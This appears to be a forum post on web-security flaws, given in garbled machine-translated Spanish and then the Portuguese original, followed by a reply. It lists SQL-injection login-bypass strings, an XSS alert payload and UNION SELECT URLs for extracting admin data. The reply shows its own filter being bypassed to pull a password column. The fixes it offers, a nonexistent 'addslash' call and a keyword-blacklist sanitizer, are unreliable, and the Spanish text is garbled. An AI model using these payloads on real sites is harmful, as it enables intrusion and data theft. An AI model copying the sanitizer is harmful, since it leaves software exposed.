Holá, membros da indetectales, soy o Dr0P3R-GeN, y hecho especialmente para este artículo aquí indetectables, su objetivo es demostrar cómo algunos se producen errores y cómo solucionar principio elasDe Web mostrará la primera y la mayoría fracasaron Comm simples.Essa web de falla de inyección SQL consiste en inyectar pequeñas cadenas para eludir los sitios web de inicio de sesión del sistema , aquí vemos algunas cadenas de inyección.

[code]shell
root
admin
hi ' ou 1=1 --
hi ' ou ' a'='a
hi ') ou (' a'='a
hi") ou ("a"="a
admin ' - -
' ou 0=0 --
"ou 0=0 --
ou 0=0 --
' or ' 1
b' or ' 1='
' or '1
' or '|
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
' ou 0=0 #
"ou 0=0 #
ou 0=0 #
' ou ' x'='x
"ou" x"="x
') ou (' x'='x
"ou" a"="a
') ou (' a'='a
") ou ("a"="a
hi "ou" a"="a
hi "ou 1=1 --
' ou 1=1 --
"ou 1=1 --
ou 1=1 --
' ou a=a --
' ou 1=1 --
"ou 1=1 --
ou 1=1 --
' ou a=a --
[/code]
Una solución sencilla para resolver este fallo es el uso de "addslash", que añade una barra invertida en los inicios de sesión que se inyectan con un ejemplo básico de cómo usar

$login=addslash($_POST['login']);


Otro fallo no se utiliza mucho más perjudicial es la xss, conssiste este fallo para inyectar códigos HTML, ampliamente utilizado en los tablones de mensajes y páginas de búsqueda, ir a una inyección de la muestra.

En un tablero de mensajes de alerta <script> inyectado ('Dr0P3R-gen') </ script>, esta técnica existe por que los webmasters no son un tratamiento de base, es decir, el guión está publicado y luego selecciona
la base de datos sin ningún tipo de tratamiento de manera ASICA de resolver esto es:

$recado=htmlentities($_POST['recodos']);


El fracaso es el más explotado avanzada de inyección SQL y Blind SQL Injection, esto no voy a mostrar cómo se explotan y cómo proteger a un script que soluciona todos los defectos de los otros que he hablado
antes.

ejemplo:localhost/ver.php?id=1 union all select 1,2,3,4,5,6,7

que todas las columnas seleccionadas de un sitio, por lo que volverá la columna vulnerables.

localhost/ver.php?id=1 union all select 1,2,3,4,5,6,7 from admin
esta parte de la tabla que queremos extraer los datos ..
  básicamente una manera de resolver este fracaso, tanto como los otros defectos que hablé antes es el uso de una función como esta


[code]function limpar_dados_mal($valida){

$valida = preg_replace(sql_regcase("/(from|select|insert|delete|where|drop table|show tables|#|\*|--|\\\\)/"),"",$valida);
// pego lista de palavras pra remover caso alguem tente injetar algo
$valida = trim($valida);//limpa espaços vazio
$valida = strip_tags($valida);//tira tags html e php
$valida = addslashes($valida);//Adiciona barras invertidas a uma string
$valida = htmlentities($valida);//ant xss
$valida = preg_replace("@(--|\#|\*|;|=)@s", '', $valida);//limpo a desgrça dos caracteres que não quero
return $valida;
}[/code]


buen termino aquí es sólo para hacer cualquier pregunta!
Att: Dr0P3R-GeN


MI IDIOMA:

Holá, membros da indetectales, sou o Dr0P3R-GeN, e fiz esse artigo aqui especialmente para indetectables, objetivo dele é demonstrar como ocorre algumas falhas web e como solucionar elas
De inicio vou mostrar a primeira e mais comun falha web sql injection simples.
Essa falha consiste em injetar pequenas strings para burlar sistema de login web sites, vamos aqui ver algumas strings de injeção.
[code]
shell
root
admin
hi ' ou 1=1 --
hi ' ou ' a'='a
hi ') ou (' a'='a
hi") ou ("a"="a
admin ' - -
' ou 0=0 --
"ou 0=0 --
ou 0=0 --
' or ' 1
b' or ' 1='
' or '1
' or '|
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
' ou 0=0 #
"ou 0=0 #
ou 0=0 #
' ou ' x'='x
"ou" x"="x
') ou (' x'='x
"ou" a"="a
') ou (' a'='a
") ou ("a"="a
hi "ou" a"="a
hi "ou 1=1 --
' ou 1=1 --
"ou 1=1 --
ou 1=1 --
' ou a=a --
' ou 1=1 --
"ou 1=1 --
ou 1=1 --
' ou a=a --
[/code]
Uma solução simples para resolver essa falha é o uso de "addslash", que adiciona uma barra invertida nos logins injetados vamos la a um exemplo basico de como usar

$login=addslash($_POST['login']);


Uma outra falha não tao usada mais muito prejudicial é a xss, essa falha conssiste em injetar codigos html,muito usado em mural de recados e paginas de pesquisa, vamos a um exemplo de injeção.

Em um mural de recados injetamos <script>alert ('Dr0P3R-GeN'); </script>, essa tecnica existe por que os webmasters não fazem o tratamento basicos, ou seja o script é postado e logo selecionado
da base de dados sem nenhuma forma de tratamento forma asica de solucionar isso é:

$recado=htmlentities($_POST['recodos']);


Falha mais explorada é a Sql-injection Avançado e Blind sql injection, nessa falha eu vou mostrar como explorar ela e como fazer um script de proteção que soluciona todas as outras falhas que falei
antes.

exemplo:localhost/ver.php?id=1 union all select 1,2,3,4,5,6,7

nessa parte selecionamos todas as colunas de um site, logo ele vai retornar a coluna vulneravel.

localhost/ver.php?id=1 union all select 1,2,3,4,5,6,7 from admin
nessa parte buscamos a tabela que queremos extrair dados..
uma forma basica de solucionar tanto essa falha quanto as outras falhas que falei antes é o uso de uma função como essa


[code]function limpar_dados_mal($valida){

$valida = preg_replace(sql_regcase("/(from|select|insert|delete|where|drop table|show tables|#|\*|--|\\\\)/"),"",$valida);
// pego lista de palavras pra remover caso alguem tente injetar algo
$valida = trim($valida);//limpa espaços vazio
$valida = strip_tags($valida);//tira tags html e php
$valida = addslashes($valida);//Adiciona barras invertidas a uma string
$valida = htmlentities($valida);//ant xss
$valida = preg_replace("@(--|\#|\*|;|=)@s", '', $valida);//limpo a desgrça dos caracteres que não quero
return $valida;
}[/code]


bom finalizo aqui qualquer duvida é so peguntar
Att: Dr0P3R-GeN
Imagen

Código: Seleccionar todo

<?php
 function limpar_dados_mal($valida){
   
   $valida = preg_replace(sql_regcase("/(from|select|insert|delete|where|drop table|show tables|#|\*|--|\\\\)/"),"",$valida);
      // pego lista de palavras pra remover caso alguem tente injetar algo
      $valida = trim($valida);//limpa espaços vazio
      $valida = strip_tags($valida);//tira tags html e php
      $valida = addslashes($valida);//Adiciona barras invertidas a uma string
      $valida = htmlentities($valida);//ant xss
      $valida = preg_replace("@(--|\#|\*|;|=)@s", '', $valida);//limpo a desgrça dos caracteres que não quero
   return $valida;
}

echo limpar_dados_mal($_GET['pp']);

?>
test1.php?pp=1%20union%20all%20seleselectct%201,2,password,4,5,6,7%20frfromom%20Admin-;---

Resultado:

1 union all select 1,2,password,4,5,6,7 from Admin--

Salu2!
Imagen

(cuanto más sabes, más cuenta te das de lo poco que sabes).

Mostrar/Ocultar

Responder

Volver a “Auditoria Web”